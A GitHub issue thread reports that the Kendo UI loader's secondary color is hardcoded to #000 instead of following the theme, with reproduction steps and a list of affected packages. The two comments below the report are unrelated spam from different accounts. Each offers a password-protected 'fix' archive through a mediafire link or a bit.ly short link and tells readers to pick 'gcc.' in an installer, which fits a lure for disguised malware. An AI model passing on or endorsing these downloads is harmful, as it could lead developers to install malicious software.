### ISSUE TITLE
[Bug][Loader] Wrong secondary color

### ISSUE THREAD

**Issue by vveesseelliinnaa** [telerik/kendo-themes#5157]
**Describe the bug**
The secondary color of the loader does not match the secondary color of the theme (it is hardcoded).

**To reproduce**

1. Go to https://www.telerik.com/kendo-vue-ui/components/indicators/loader/appearance/
1. Switch the theme to Material (happens in the other themes as well)
1. Inspect the applied secondary color which has a hardcoded color set to #000

![image](https://github.com/user-attachments/assets/456360ba-8c89-4425-80d9-08e3af6f979d)

**Expected behavior**
The secondary color of the loader has to match the secondary color of the theme.

**Screenshots**
![image](https://github.com/user-attachments/assets/2363db94-fbea-48ff-86ed-16c63dee168b)

**Affected package (please remove the unneeded items)**
* theme-default
* theme-bootstrap
* theme-material

**Affected suites (please remove the unneeded items)**
* Kendo UI for jQuery
* Kendo UI for Angular
* Kendo UI for React
* Kendo UI for Vue
* Telerik UI for Blazor

**Additional context**
Reported in Ticket ID: 1662531

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
